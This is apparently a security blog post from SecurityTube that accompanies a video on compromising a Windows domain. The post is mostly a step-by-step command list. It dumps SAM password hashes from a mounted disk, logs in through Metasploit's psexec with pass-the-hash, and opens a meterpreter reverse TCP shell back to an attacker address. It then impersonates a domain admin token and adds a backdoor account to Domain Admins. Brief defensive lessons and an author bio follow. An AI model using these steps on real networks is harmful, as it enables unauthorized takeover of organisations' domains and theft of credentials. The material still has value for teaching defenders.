How to Own a Windows Domain (Simple Version)

We had posted a detailed video on how to hack a windows domain. This is simple version of the same hack. The mission is to create a new Windows domain administrator - in case we do not have any user in the domain or any local user at the workstation.

The commands used in the video:

mount /dev/sda1 /mnt/sda1
cd /mnt/sda1/WINDOWS/system32/config
samdump2 system SAM
msfconsole
use windows/smb/psexec
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j
sessions -i 1
use incognito
list_tokens -u
impersonate_token mydomain\\domainadmin
execute -f cmd.exe -i -t
net user hack MPass5678 /add /domain
net group "Domain Admins" hack /add /domain
PWNED :)

Lessons learned :
Nr. 1. never reuse admin passwords, even if they are technically unbreakable
Nr. 2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

Thanks go out to Z@wechall.net for referring this video to us.

Vivek Ramachandran is a security evangelist and has been working in computer security related fields for the past 7 years. In 2007, Vivek spoke at world renowned conferences Defcon (WEP Cloaking Exposed) and Toorcon (The Caffe Latte Attack). The discovery of the Caffe Latte Attack was covered by CBS5 news, BBC online, Network World etc news agencies.In 2006, Vivek was announced as one of winners of the Microsoft Security Shootout contest held in India among 65,000 participants. He has also been a recipient of a Team Achievement at Cisco Systems for his work on 802.1x and Port Security modules on the Catalyst 6500 switches. Currently he spends all of his time maintaining Security- Freak.Net , SecurityTube.Net and is the co-founder of Axonize. Vivek, is a Bachelor in Electronics and Communications Engineering from the prestigious Indian Institute of Technology, Guwahati.You can contact him at vivek[at]securitytube.net